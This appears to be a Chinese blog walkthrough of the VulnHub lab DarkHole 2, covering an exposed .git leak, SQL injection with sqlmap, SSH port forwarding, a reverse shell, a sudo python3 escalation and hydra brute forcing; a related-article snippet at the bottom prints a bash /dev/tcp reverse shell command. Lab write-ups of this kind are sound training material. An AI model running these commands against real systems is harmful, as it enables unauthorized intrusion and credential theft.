vulnhub之darkhole_2

最新推荐文章于 2024-07-29 09:22:32 发布
最新推荐文章于 2024-07-29 09:22:32 发布
阅读量486 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: web安全 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54431413/article/details/125585499
版权

目录

一、主机发现

二、端口扫描

三、服务版本发现

四、信息收集

五、.git

1.下载.git

2.查看版本历史

3.生成最新版本源码

4.查看有漏洞的那一版

5.登录

六、sqlmap注入

七、ssh登录

八、端口转发

 九、losy信息收集

十、sudo提权

 十一、hydra暴力破解

一、主机发现

二、端口扫描

三、服务版本发现

这里值得注意的就是.git,这是源码也放上来了。其他还是老样子。

四、信息收集

1.主页

主页一张图片,源码中啥都没有。

 有个登录界面。

 2.扫目录

大部分有用信息都指向了.git,这与我们上面收集到的信息是相同的

五、.git

注意:最好用2021版的kali,2022最新版的git clone会报错,也不知道为啥

1.下载.git

wget -r  http://192.168.0.108/.git/

2.查看版本历史

3.生成最新版本源码

 git clone . backup

在源码中的登录php中,我们可以看到这里进行了对输入参数进行了转义,防止注入

4.查看有漏洞的那一版

这里在转换分支的时候,有时候要先执行

git stash

转换分支

git checkout a4d900a8d85e8938d3601f3cef113ee293028e10

进入查看,得到了上个版本用的账号密码。很有可能上个版本的账号密码在这个版本可以用于登录

5.登录

六、sqlmap注入

1' 无回显结果。

1'and+1=1--+ 和1输出结果相同。

证明存在sql注入,sqlmap跑一下

burp抓包,

(1)跑库

sqlmap -r ~/Desktop/1 --dbs

四个默认库,一个darkhole_2

 (2)跑表

(3)dump下来

ssh:

users:

七、ssh登录

1.

拿到了一个jehad的shell。

 在信息收集中,我们看到.bash_history中有很多提示信息。这里给了我们提示,做一个端口转发,然后来执行命令。

2.9999端口服务信息

内容:

ps -aux | grep 9999

可以看到程序是以losy运行的,我们利用他执行反弹shell后得到一个losy的shell

 

八、端口转发

为什么要做这个端口转发呢,因为我们在kali端访问不到目标靶机9999端口部署的服务脚本。

这里的127.0.0.1视为目标靶机(远程目标)的地址。

当然其实我们可以直接用拿到的jehad这个用户,在本地执行命令。

1.kali端

ssh -L 9633:127.0.0.1:9999 jehad@192.168.0.108

在端口转发后我们可以在kali端实现命令执行操作。

2.反弹shell

在.bash_history其实给我们提供了几种反弹shell的方式,其实就是黑客在入侵时尝试的几种方式,但是好像是都没用

进行url编码:

提交后成功反弹。

 九、losy信息收集

升级shell,密码都告诉我们了

十、sudo提权

用上面给的python命令就行

sudo python3 -c 'import os; os.system("/bin/sh")'

 十一、hydra暴力破解

lama权限过大,密码过于简单。

登陆后使用sudo提权

 

 

 

梅_花_七
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机:DARKHOLE_ 2
LainWith的博客
09-14 1285
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
2024年网络安全最全VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新2024最新网络安全面试真题解析
2401_84297944的博客
05-11 587
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 1059
VulnHub-DarkHole: 2靶机详细渗透过程
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3687
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHubDarkHole_ 1
2301_76786857的博客
07-09 167
靶机IP:192.168.245.143测试机系统:kali、win10测试机IP:192.168.245.139。
VulnHubDarkHole_ 2
2301_76786857的博客
06-19 87
靶机下载地址为:vulnhub-DARKHOLE: 2靶机IP:192.168.245.140测试机系统:kali、win10测试机IP:192.168.245.139。
VulnHub——DarkHole_2
weixin_52512479的博客
08-03 168
IP:192.168.197.136,开启端口:22、80查看80端口存在登录界面,这里需要输入邮箱,密码。。。
VulnHub-DarkHole_2靶机实战(超详细保姆级教程),2024年最新重磅分享
2301_77116622的博客
04-14 799
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;
Vulnhub之DARKHOLE: 2渗透测试
Bird&Bird
01-11 3822
目录1、靶机概述2、信息搜集分析git源码SQL注入获取losy用户shell提权到root 1、靶机概述 Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Force kali:192.168.110.128 靶机:192.168.110.137 2、信息搜集 首先探测靶机IP地址 扫一下端口和服务,可知靶机只开启了2
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1713
“微软蓝屏”事件暴露了网络安全哪些问题
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
07-29 301
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
“微软蓝屏“事件暴露了网络安全哪些问题?
程序员-张师傅
07-23 933
微软蓝屏事件,尤其是2024年7月19日发生的全球性Windows系统崩溃事件,带来了多方面的深刻教训。
网络安全相关竞赛比赛
黑战士的博客
07-18 1193
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全之不同阶段攻防手段(四)
子非渔
07-25 385
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
Linux初学基本命令
yuan20010401的博客
07-25 365
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
linux上导出数据库
weixin_43652507的博客
07-24 327
linux上导出数据库 MySQL、PostgreSQL、SQLite、MongoDB
【linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4394
在Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值